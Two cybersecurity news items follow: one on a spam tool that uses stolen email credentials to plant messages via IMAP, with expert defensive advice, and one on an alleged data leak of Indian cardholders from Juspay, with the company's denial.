Databases of usernames and passwords to mail are actively sold out on hacker forums. According to Gemini Advisory, an attacker can upload such a database to Email Appender, after which the program will try to connect to accounts that match pairs of usernames and passwords via IMAP. Next, it remains to use the IMAP function, which allows hackers to upload ready-made mail messages to the mailbox.

"There are a number of ways to block such spam campaigns, but the main one is to regularly change passwords and not use the same combination (or similar to it) more than once," said Alexey Vodiasov, technical Director of the company SEC Consult Services.

In addition, according to Vodiasov, two-factor authorization is effective, so that even a compromised account cannot be connected without attracting the attention of its rightful owner.

The expert added that it is also possible to enable notifications of cases of logging into an account from unusual IP addresses. Mail systems are quite capable of doing this.

Massive Data Dump of 10 Crore Indian Card Holders Leaked on Dark Web

 

The data of 10 Crore Indian cardholders has been sold on the Dark Web for an unknown amount. The information has been disclosed by the independent cybersecurity researcher Rajshekhar Rajaharia who further stated that ‘hackers attacked the server of Bangalore-based digital payments portal Juspay and after the server was compromised they leaked the data of 10 Crore Indian debit and credit card holders on Dark Web’.

Juspay stated to IANS that people are being misinformed through media which has been telling users not to worry about their financial information. There has been no data leak regarding the card numbers and the victims of cyber attacks are much lower than the 10 Crore mark, media stated. 

While giving insights into the security incident, Juspay told, “on August 18, 2020, an unauthorized attempt on our servers was detected and terminated when in progress. No card numbers, financial credentials or transaction data were compromised; some data records containing non-anonymized, plain-text email and phone numbers were compromised, which form a fraction of the 10 Crore data records”. 

However, Rajshekhar Rajaharia was of different opinion and in relation to that, he said, the financial information of all 10 Crore cardholders is in jeopardy if the attackers can detect the Hash algorithm which is used to develop the card fingerprint and by using this algorithm they can decrypt the concealed card number.

Juspay was launched by the two former Amazon engineers Ramanathan RV and Vimal Kumar in August 2012 and was later joined by Bloomberg executive Sheetal Lalwani.  The company has raised a total of $21.6M via funding and the last funding round was in March 2020. 

The data revealed on the Dark Web contains ‘confidential information regarding debit and credit cards of cardholders including expiry date, card fingerprint, ISIN, the type of card, users' card brand (VISA/Rupay/Mastercard), the last four digits of the card, and user account ID.

The company spokesperson acknowledged that only a few contact numbers and email addresses have been leaked which have little to no value; According to him, no sensitive information regarding card numbers was accessed. He further asserted that no transaction or order information was compromised.